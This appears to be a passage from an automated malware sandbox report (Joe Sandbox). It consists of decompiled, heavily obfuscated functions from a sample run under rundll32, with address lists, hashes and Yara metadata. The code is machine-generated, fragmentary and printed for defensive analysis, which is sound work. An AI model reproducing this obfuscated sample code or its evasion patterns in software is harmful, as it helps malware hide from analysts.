							_t120 = _t120 + 0xc;
							_t103 = 0xf0cd209;
							continue;
						} else {
							if(_t103 != 0xf0cd209) {
								L9:
								__eflags = _t103 - 0x1b06c67;
								if(__eflags != 0) {
									continue;
								} else {
								}
							} else {
								_t100 = E00332A21(_v80, _v52,  &_v44, _t115 + 0x38, _v68);
								_t120 = _t120 + 0xc;
								if(_t100 != 0) {
									_t103 = 0x5a97fa2;
									continue;
								}
							}
						}
					}
					return _t116;
				}
				_t103 = 0xa5a4144;
				goto L9;
			}






















                                                                                                                    0x00331a5d
                                                                                                                    0x00331a61
                                                                                                                    0x00331a63
                                                                                                                    0x00331a65
                                                                                                                    0x00331a69
                                                                                                                    0x00331a6a
                                                                                                                    0x00331a6b
                                                                                                                    0x00331a70
                                                                                                                    0x00331a78
                                                                                                                    0x00331a7b
                                                                                                                    0x00331a85
                                                                                                                    0x00331a8d
                                                                                                                    0x00331a8f
                                                                                                                    0x00331a97
                                                                                                                    0x00331a9c
                                                                                                                    0x00331aa4
                                                                                                                    0x00331aac
                                                                                                                    0x00331ab4
                                                                                                                    0x00331abc
                                                                                                                    0x00331ac4
                                                                                                                    0x00331ad3
                                                                                                                    0x00331ad4
                                                                                                                    0x00331ad8
                                                                                                                    0x00331ae0
                                                                                                                    0x00331ae8
                                                                                                                    0x00331af5
                                                                                                                    0x00331af9
                                                                                                                    0x00331b01
                                                                                                                    0x00331b06
                                                                                                                    0x00331b0e
                                                                                                                    0x00331b16
                                                                                                                    0x00331b1e
                                                                                                                    0x00331b26
                                                                                                                    0x00331b2e
                                                                                                                    0x00331b38
                                                                                                                    0x00331b3c
                                                                                                                    0x00331b44
                                                                                                                    0x00331b4c
                                                                                                                    0x00331b51
                                                                                                                    0x00331b59
                                                                                                                    0x00331b61
                                                                                                                    0x00331b69
                                                                                                                    0x00331b6e
                                                                                                                    0x00331b72
                                                                                                                    0x00331b7d
                                                                                                                    0x00331b81
                                                                                                                    0x00331b89
                                                                                                                    0x00331b91
                                                                                                                    0x00331b96
                                                                                                                    0x00331b9e
                                                                                                                    0x00331ba6
                                                                                                                    0x00331bb0
                                                                                                                    0x00331c36
                                                                                                                    0x00331c38
                                                                                                                    0x00331bb2
                                                                                                                    0x00331bb8
                                                                                                                    0x00331bf9
                                                                                                                    0x00331bfe
                                                                                                                    0x00331c01
                                                                                                                    0x00000000
                                                                                                                    0x00331bba
                                                                                                                    0x00331bc0
                                                                                                                    0x00331c0d
                                                                                                                    0x00331c0d
                                                                                                                    0x00331c13
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00331c15
                                                                                                                    0x00331bc2
                                                                                                                    0x00331bd7
                                                                                                                    0x00331bdc
                                                                                                                    0x00331be1
                                                                                                                    0x00331be3
                                                                                                                    0x00000000
                                                                                                                    0x00331be3
                                                                                                                    0x00331be1
                                                                                                                    0x00331bc0
                                                                                                                    0x00331bb8
                                                                                                                    0x00331c44
                                                                                                                    0x00331c44
                                                                                                                    0x00331c08
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %#O$DAZ$DAZ
                                                                                                                    • API String ID: 0-2081751441
                                                                                                                    • Opcode ID: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
                                                                                                                    • Instruction ID: 723928b74d78bd8f429957c42dafcc61e965476906e40984e0ee04f59008c421
                                                                                                                    • Opcode Fuzzy Hash: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
                                                                                                                    • Instruction Fuzzy Hash: 5E5164725083019FC759CF25D98A82FBBE1FBD8708F501A2DF586A6220D375CA098B87
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00350C14 Relevance: 3.9, Strings: 3, Instructions: 113COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E00350C14(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t111;
				void* _t115;
				void* _t116;
				signed int _t118;
				void* _t124;
				void* _t125;
				signed int* _t127;

				_t127 =  &_v44;
				_t116 = __ecx;
				_v24 = 0x2b1199;
				_v24 = _v24 + 0x4ba2;
				_v24 = _v24 << 0xa;
				_v24 = _v24 ^ 0xad737bf1;
				_v44 = 0xc9a4fe;
				_v44 = _v44 << 0xe;
				_v44 = _v44 | 0xe69540e1;
				_v44 = _v44 + 0xffffff88;
				_v44 = _v44 ^ 0xefbb2da7;
				_v28 = 0xedc73;
				_v28 = _v28 + 0xffff2701;
				_v28 = _v28 + 0x8bbf;
				_v28 = _v28 ^ 0x00055e2c;
				_v16 = 0xf95115;
				_v16 = _v16 | 0x79ce56df;
				_v16 = _v16 + 0xffff5817;
				_v16 = _v16 ^ 0x79f40a5c;
				_v36 = 0x520750;
				_v36 = _v36 << 7;
				_v36 = _v36 ^ 0x4f263ebd;
				_v36 = _v36 * 6;
				_v36 = _v36 ^ 0x64ef8369;
				_t124 = 0;
				_v40 = 0xccfebc;
				_t125 = 0x2aa38ff;
				_v40 = _v40 + 0xbaf7;
				_t118 = 0xd;
				_v40 = _v40 * 0x5e;
				_v40 = _v40 + 0x6a66;
				_v40 = _v40 ^ 0x4b80704d;
				_v20 = 0xba2b89;
				_v20 = _v20 + 0xa093;
				_v20 = _v20 / _t118;
				_v20 = _v20 ^ 0x000a03fd;
				_v32 = 0xb0f3b0;
				_v32 = _v32 + 0x50dc;
				_v32 = _v32 + 0xffff1629;
				_v32 = _v32 * 0x4e;
				_v32 = _v32 ^ 0x35b73aee;
				_v4 = 0x432383;
				_v4 = _v4 + 0xffff373f;
				_v4 = _v4 | 0x7532efd9;
				_v4 = _v4 ^ 0x75785e39;
				_v8 = 0x709bec;
				_v8 = _v8 + 0xffffb2bc;
				_v8 = _v8 + 0xffff08e7;
				_v8 = _v8 ^ 0x006dec69;
				_v12 = 0xe79dac;
				_v12 = _v12 * 0x78;
				_v12 = _v12 + 0xb337;
				_v12 = _v12 ^ 0x6c9daebe;
				do {
					while(_t125 != 0x2aa38ff) {
						if(_t125 == 0x81ec960) {
							_t124 = _t124 + E0034C2F8(_v32, _t116 + 0x38, _v4, _v8, _v12);
						} else {
							if(_t125 == 0xa7224d4) {
								_t118 = _v16;
								_t111 = E0034C2F8(_t118, _t116 + 0x14, _v36, _v40, _v20);
								_t127 =  &(_t127[3]);
								_t125 = 0x81ec960;
								_t124 = _t124 + _t111;
								continue;
							} else {
								if(_t125 != 0xcb4deb0) {
									goto L8;
								} else {
									_push(_t118);
									_push(_t118);
									_t115 = E0033474B();
									_t127 =  &(_t127[2]);
									_t125 = 0xa7224d4;
									_t124 = _t124 + _t115;
									continue;
								}
							}
						}
						L11:
						return _t124;
					}
					_t125 = 0xcb4deb0;
					L8:
				} while (_t125 != 0x4501b46);
				goto L11;
			}





















                                                                                                                    0x00350c14
                                                                                                                    0x00350c1b
                                                                                                                    0x00350c1d
                                                                                                                    0x00350c27
                                                                                                                    0x00350c2f
                                                                                                                    0x00350c34
                                                                                                                    0x00350c3c
                                                                                                                    0x00350c44
                                                                                                                    0x00350c49
                                                                                                                    0x00350c51
                                                                                                                    0x00350c56
                                                                                                                    0x00350c5e
                                                                                                                    0x00350c66
                                                                                                                    0x00350c6e
                                                                                                                    0x00350c76
                                                                                                                    0x00350c7e
                                                                                                                    0x00350c86
                                                                                                                    0x00350c8e
                                                                                                                    0x00350c96
                                                                                                                    0x00350c9e
                                                                                                                    0x00350ca6
                                                                                                                    0x00350cab
                                                                                                                    0x00350cb8
                                                                                                                    0x00350cbc
                                                                                                                    0x00350cc4
                                                                                                                    0x00350cc6
                                                                                                                    0x00350cce
                                                                                                                    0x00350cd3
                                                                                                                    0x00350ce7
                                                                                                                    0x00350ce8
                                                                                                                    0x00350cec
                                                                                                                    0x00350cf4
                                                                                                                    0x00350cfc
                                                                                                                    0x00350d04
                                                                                                                    0x00350d12
                                                                                                                    0x00350d16
                                                                                                                    0x00350d1e
                                                                                                                    0x00350d26
                                                                                                                    0x00350d2e
                                                                                                                    0x00350d3b
                                                                                                                    0x00350d3f
                                                                                                                    0x00350d47
                                                                                                                    0x00350d4f
                                                                                                                    0x00350d57
                                                                                                                    0x00350d5f
                                                                                                                    0x00350d67
                                                                                                                    0x00350d6f
                                                                                                                    0x00350d77
                                                                                                                    0x00350d7f
                                                                                                                    0x00350d87
                                                                                                                    0x00350d94
                                                                                                                    0x00350d98
                                                                                                                    0x00350da0
                                                                                                                    0x00350da8
                                                                                                                    0x00350da8
                                                                                                                    0x00350db6
                                                                                                                    0x00350e2e
                                                                                                                    0x00350db8
                                                                                                                    0x00350dbe
                                                                                                                    0x00350df2
                                                                                                                    0x00350df6
                                                                                                                    0x00350dfb
                                                                                                                    0x00350dfe
                                                                                                                    0x00350e03
                                                                                                                    0x00000000
                                                                                                                    0x00350dc0
                                                                                                                    0x00350dc2
                                                                                                                    0x00000000
                                                                                                                    0x00350dc4
                                                                                                                    0x00350dd0
                                                                                                                    0x00350dd1
                                                                                                                    0x00350dd2
                                                                                                                    0x00350dd7
                                                                                                                    0x00350dda
                                                                                                                    0x00350ddf
                                                                                                                    0x00000000
                                                                                                                    0x00350ddf
                                                                                                                    0x00350dc2
                                                                                                                    0x00350dbe
                                                                                                                    0x00350e30
                                                                                                                    0x00350e39
                                                                                                                    0x00350e39
                                                                                                                    0x00350e07
                                                                                                                    0x00350e09
                                                                                                                    0x00350e09
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 9^xu$fj$im
                                                                                                                    • API String ID: 0-3261451082
                                                                                                                    • Opcode ID: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
                                                                                                                    • Instruction ID: 5310b4e0a61d05d562fb7f2b1ec9f4a1de3616684536bbaa9c3967df91f2af6d
                                                                                                                    • Opcode Fuzzy Hash: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
                                                                                                                    • Instruction Fuzzy Hash: 205148B24083429BC788CF25D58980BBBE0BFD8368F511A1DF8D566260D3B5DA49CF87
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00339B83 Relevance: 3.9, Strings: 3, Instructions: 109COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 82%
                                                                                                                    			E00339B83(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				void* _v64;
				intOrPtr _v68;
				void* _t115;
				signed int _t130;
				signed int _t131;
				void* _t133;

				_push(_a16);
				_push(_a12);
				_v52 = 0x104;
				_push(_a8);
				_push(_a4);
				_push(0x104);
				_push(__ecx);
				E003420B9(0x104);
				_v68 = 0x342964;
				asm("stosd");
				_t133 = 0;
				asm("stosd");
				asm("stosd");
				_v40 = 0xa3a3c;
				_v40 = _v40 + 0x2c25;
				_v40 = _v40 ^ 0x000a7661;
				_v16 = 0x75ee44;
				_t130 = 0x7a;
				_v16 = _v16 / _t130;
				_v16 = _v16 ^ 0xc9e42672;
				_v16 = _v16 ^ 0xc9e58a7e;
				_v8 = 0x386b92;
				_v8 = _v8 << 4;
				_v8 = _v8 | 0x0ec9a536;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x000b4478;
				_v44 = 0xd66787;
				_v44 = _v44 >> 3;
				_v44 = _v44 ^ 0x001d593f;
				_v24 = 0x7c5a73;
				_v24 = _v24 | 0xae316990;
				_t131 = 0x19;
				_v24 = _v24 / _t131;
				_v24 = _v24 ^ 0x06f0967a;
				_v20 = 0x3dfd52;
				_v20 = _v20 >> 8;
				_v20 = _v20 * 0x24;
				_v20 = _v20 ^ 0x0009affd;
				_v12 = 0xf0c6a5;
				_v12 = _v12 + 0xffff2be4;
				_v12 = _v12 + 0x1686;
				_v12 = _v12 << 2;
				_v12 = _v12 ^ 0x03c3840c;
				_v48 = 0x30c967;
				_v48 = _v48 | 0xcae095b2;
				_v48 = _v48 ^ 0xcaf7f966;
				_v36 = 0xabcbdc;
				_v36 = _v36 + 0xfffff856;
				_v36 = _v36 | 0xb2b71321;
				_v36 = _v36 ^ 0xb2b3c312;
				_v32 = 0xda8dbe;
				_v32 = _v32 + 0xffff364b;
				_v32 = _v32 | 0x02598b37;
				_v32 = _v32 ^ 0x02d31c0a;
				_v28 = 0x528ee8;
				_v28 = _v28 * 0x12;
				_v28 = _v28 << 2;
				_v28 = _v28 ^ 0x17383776;
				_t115 = E003391DD(__ecx, _v40, __ecx);
				_t132 = _t115;
				if(_t115 != 0) {
					_t133 = E003376AA(_a12,  &_v52, _v44, _v24, __ecx, _v20, _t132, _v12);
					E00341E67(_v48, _v36, _v32, _v28, _t132);
				}
				return _t133;
			}





















                                                                                                                    0x00339b8b
                                                                                                                    0x00339b93
                                                                                                                    0x00339b96
                                                                                                                    0x00339b99
                                                                                                                    0x00339b9c
                                                                                                                    0x00339b9f
                                                                                                                    0x00339ba0
                                                                                                                    0x00339ba1
                                                                                                                    0x00339ba6
                                                                                                                    0x00339bb4
                                                                                                                    0x00339bb5
                                                                                                                    0x00339bb9
                                                                                                                    0x00339bba
                                                                                                                    0x00339bbb
                                                                                                                    0x00339bc2
                                                                                                                    0x00339bc9
                                                                                                                    0x00339bd0
                                                                                                                    0x00339bda
                                                                                                                    0x00339bdf
                                                                                                                    0x00339be4
                                                                                                                    0x00339beb
                                                                                                                    0x00339bf2
                                                                                                                    0x00339bf9
                                                                                                                    0x00339bfd
                                                                                                                    0x00339c04
                                                                                                                    0x00339c08
                                                                                                                    0x00339c0f
                                                                                                                    0x00339c16
                                                                                                                    0x00339c1a
                                                                                                                    0x00339c21
                                                                                                                    0x00339c28
                                                                                                                    0x00339c32
                                                                                                                    0x00339c38
                                                                                                                    0x00339c3b
                                                                                                                    0x00339c42
                                                                                                                    0x00339c49
                                                                                                                    0x00339c52
                                                                                                                    0x00339c55
                                                                                                                    0x00339c5c
                                                                                                                    0x00339c63
                                                                                                                    0x00339c6a
                                                                                                                    0x00339c71
                                                                                                                    0x00339c75
                                                                                                                    0x00339c7c
                                                                                                                    0x00339c83
                                                                                                                    0x00339c8a
                                                                                                                    0x00339c91
                                                                                                                    0x00339c98
                                                                                                                    0x00339c9f
                                                                                                                    0x00339ca6
                                                                                                                    0x00339cad
                                                                                                                    0x00339cb4
                                                                                                                    0x00339cbb
                                                                                                                    0x00339cc2
                                                                                                                    0x00339cc9
                                                                                                                    0x00339cd4
                                                                                                                    0x00339cd7
                                                                                                                    0x00339cdb
                                                                                                                    0x00339ceb
                                                                                                                    0x00339cf3
                                                                                                                    0x00339cf7
                                                                                                                    0x00339d16
                                                                                                                    0x00339d21
                                                                                                                    0x00339d26
                                                                                                                    0x00339d30

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Du$av$sZ|
                                                                                                                    • API String ID: 0-3795359321
                                                                                                                    • Opcode ID: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
                                                                                                                    • Instruction ID: 87e0833b519ce751f2d62f896d5bbecb2ecb7d8b72f303f924b84b530b236b18
                                                                                                                    • Opcode Fuzzy Hash: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
                                                                                                                    • Instruction Fuzzy Hash: 215114B1D00209EBDF09DFE5C94A8EEBBB1FB48318F108159E411B6260D3755A54DFA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00346C49 Relevance: 3.9, Strings: 3, Instructions: 104COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E00346C49(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char _v88;
				char _v608;
				void* _t92;
				void* _t96;
				void* _t101;
				void* _t112;
				void* _t113;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003420B9(_t92);
				_v52 = _v52 & 0x00000000;
				_v56 = 0x878462;
				_t113 = _t112 + 0x14;
				_v32 = 0x956791;
				_t101 = 0x1300659;
				_v32 = _v32 + 0xffff68af;
				_v32 = _v32 ^ 0x0094d050;
				_v48 = 0xb6c679;
				_v48 = _v48 * 9;
				_v48 = _v48 ^ 0x0662f925;
				_v16 = 0xd9c762;
				_v16 = _v16 << 1;
				_v16 = _v16 | 0xb4c78449;
				_v16 = _v16 ^ 0xb5f30401;
				_v40 = 0x8b331e;
				_v40 = _v40 >> 0xc;
				_v40 = _v40 ^ 0x000c5129;
				_v28 = 0x1269f4;
				_v28 = _v28 >> 4;
				_v28 = _v28 ^ 0x0007e996;
				_v44 = 0xabd705;
				_v44 = _v44 ^ 0x9c90d177;
				_v44 = _v44 ^ 0x9c3fe788;
				_v8 = 0x357d72;
				_v8 = _v8 + 0xd90c;
				_v8 = _v8 ^ 0xccfdbdcb;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x199e890f;
				_v12 = 0x32e6;
				_v12 = _v12 ^ 0x74a35607;
				_v12 = _v12 | 0x704b9008;
				_v12 = _v12 + 0xffff83aa;
				_v12 = _v12 ^ 0x74eee325;
				_v36 = 0xeddfb6;
				_v36 = _v36 << 0xa;
				_v36 = _v36 ^ 0xb77b8cf2;
				_v24 = 0xe2b758;
				_v24 = _v24 << 5;
				_v24 = _v24 * 0x38;
				_v24 = _v24 ^ 0x330719f5;
				_v20 = 0x9236d6;
				_v20 = _v20 | 0x3f0523f5;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 ^ 0x000835ca;
				do {
					while(_t101 != 0x1300659) {
						if(_t101 == 0xa264c44) {
							_t96 = E00339D31(_v40,  &_v608, _v28, _t101, _v44, _v8);
							_t113 = _t113 + 0x10;
							_t101 = 0xbcabc0e;
							continue;
						}
						if(_t101 != 0xbcabc0e) {
							goto L8;
						}
						return E00346637( &_v88, _v12, _v36, _v24,  &_v608, _a12, _v20);
					}
					_t96 = E00334B61( &_v88, _v32, _v48, _v16);
					_t101 = 0xa264c44;
					L8:
				} while (_t101 != 0x478adce);
				return _t96;
			}























                                                                                                                    0x00346c55
                                                                                                                    0x00346c58
                                                                                                                    0x00346c5b
                                                                                                                    0x00346c5e
                                                                                                                    0x00346c5f
                                                                                                                    0x00346c60
                                                                                                                    0x00346c65
                                                                                                                    0x00346c6e
                                                                                                                    0x00346c75
                                                                                                                    0x00346c78
                                                                                                                    0x00346c7f
                                                                                                                    0x00346c81
                                                                                                                    0x00346c8d
                                                                                                                    0x00346c99
                                                                                                                    0x00346ca4
                                                                                                                    0x00346ca7
                                                                                                                    0x00346cae
                                                                                                                    0x00346cb5
                                                                                                                    0x00346cb8
                                                                                                                    0x00346cbf
                                                                                                                    0x00346cc6
                                                                                                                    0x00346ccd
                                                                                                                    0x00346cd1
                                                                                                                    0x00346cd8
                                                                                                                    0x00346cdf
                                                                                                                    0x00346ce3
                                                                                                                    0x00346cea
                                                                                                                    0x00346cf1
                                                                                                                    0x00346cf8
                                                                                                                    0x00346cff
                                                                                                                    0x00346d06
                                                                                                                    0x00346d0d
                                                                                                                    0x00346d14
                                                                                                                    0x00346d18
                                                                                                                    0x00346d1f
                                                                                                                    0x00346d26
                                                                                                                    0x00346d2d
                                                                                                                    0x00346d34
                                                                                                                    0x00346d3b
                                                                                                                    0x00346d42
                                                                                                                    0x00346d49
                                                                                                                    0x00346d4d
                                                                                                                    0x00346d54
                                                                                                                    0x00346d5b
                                                                                                                    0x00346d63
                                                                                                                    0x00346d66
                                                                                                                    0x00346d6d
                                                                                                                    0x00346d74
                                                                                                                    0x00346d7b
                                                                                                                    0x00346d7f
                                                                                                                    0x00346d86
                                                                                                                    0x00346d86
                                                                                                                    0x00346d8c
                                                                                                                    0x00346dcd
                                                                                                                    0x00346dd2
                                                                                                                    0x00346dd5
                                                                                                                    0x00000000
                                                                                                                    0x00346dd5
                                                                                                                    0x00346d90
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00346db0
                                                                                                                    0x00346de5
                                                                                                                    0x00346dec
                                                                                                                    0x00346dee
                                                                                                                    0x00346dee
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: %t$DL&$r}5
                                                                                                                    • API String ID: 0-2337153543
                                                                                                                    • Opcode ID: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
                                                                                                                    • Instruction ID: 5ea5d47ecee30431de6b9de4353c37f9d761ffcbf4e4b4b42d965be9d5a76b6f
                                                                                                                    • Opcode Fuzzy Hash: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
                                                                                                                    • Instruction Fuzzy Hash: FD412371D0020EEBCF0ADFE1D94A4EEBBB1FB49318F208098D5117A260D3B55A59CFA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 1003B8BC Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __decode_pointer.LIBCMT ref: 1003B8CA
                                                                                                                      • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350BB
                                                                                                                      • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350D2
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32 ref: 1003B8D1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1958600898-0
                                                                                                                    • Opcode ID: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                    • Instruction ID: 13914855b6ed5f75d6cf868945e622cc1528c9e1cf50f9ea13f0b817109926cd
                                                                                                                    • Opcode Fuzzy Hash: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                    • Instruction Fuzzy Hash: 7FC08C388087C04FEB1AD3354D8C30D3E00E713301FC00488DC80D5053EE99410C8323
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 003495FA Relevance: 2.8, Strings: 2, Instructions: 282COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E003495FA() {
				char _v524;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				intOrPtr _t295;
				void* _t297;
				void* _t298;
				intOrPtr _t299;
				signed int _t306;
				void* _t309;
				void* _t310;
				char _t311;
				void* _t317;
				intOrPtr _t334;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				void* _t347;

				_v668 = 0xe6fb93;
				_v668 = _v668 + 0xffff1eed;
				_t310 = 0xada6804;
				_v668 = _v668 * 0x61;
				_t309 = 0;
				_v668 = _v668 ^ 0xaca28cc6;
				_v668 = _v668 ^ 0xfb928647;
				_v616 = 0x8caf33;
				_t341 = 0x42;
				_v616 = _v616 * 0x25;
				_v616 = _v616 * 0x4f;
				_v616 = _v616 ^ 0x46546a51;
				_v620 = 0x861136;
				_v620 = _v620 | 0x52f06d4d;
				_v620 = _v620 >> 0xf;
				_v620 = _v620 ^ 0x0000a5ef;
				_v628 = 0x4cf396;
				_v628 = _v628 >> 1;
				_v628 = _v628 >> 9;
				_v628 = _v628 ^ 0x0000133c;
				_v684 = 0xc54e58;
				_v684 = _v684 >> 2;
				_v684 = _v684 ^ 0xb8bf25ee;
				_v684 = _v684 >> 2;
				_v684 = _v684 ^ 0x2e259ad3;
				_v592 = 0x68267f;
				_v592 = _v592 + 0xffff39c4;
				_v592 = _v592 ^ 0x006c60f9;
				_v632 = 0xa1d089;
				_v632 = _v632 / _t341;
				_v632 = _v632 ^ 0x52222b14;
				_v632 = _v632 ^ 0x5220bcfc;
				_v608 = 0x39d352;
				_v608 = _v608 | 0x2e7e1ae1;
				_v608 = _v608 ^ 0x576cc274;
				_v608 = _v608 ^ 0x7911cf35;
				_v660 = 0xc26f36;
				_v660 = _v660 ^ 0x9f5dc88a;
				_v660 = _v660 ^ 0xeefda613;
				_t342 = 0x3f;
				_v660 = _v660 / _t342;
				_v660 = _v660 ^ 0x01ce77bb;
				_v624 = 0x334861;
				_v624 = _v624 + 0xffff4b1a;
				_t343 = 0x2a;
				_v624 = _v624 * 0x2f;
				_v624 = _v624 ^ 0x0947e580;
				_v652 = 0xab72b9;
				_v652 = _v652 << 8;
				_v652 = _v652 / _t343;
				_v652 = _v652 ^ 0x0419701b;
				_v688 = 0x507748;
				_v688 = _v688 << 5;
				_v688 = _v688 + 0xffff449a;
				_v688 = _v688 + 0xb858;
				_v688 = _v688 ^ 0x0a0a66f0;
				_v600 = 0x95cabc;
				_v600 = _v600 + 0xffffb185;
				_v600 = _v600 << 9;
				_v600 = _v600 ^ 0x2af43595;
				_v580 = 0x7e3ec7;
				_v580 = _v580 ^ 0x09caac24;
				_v580 = _v580 ^ 0x09b70662;
				_v612 = 0xa526a8;
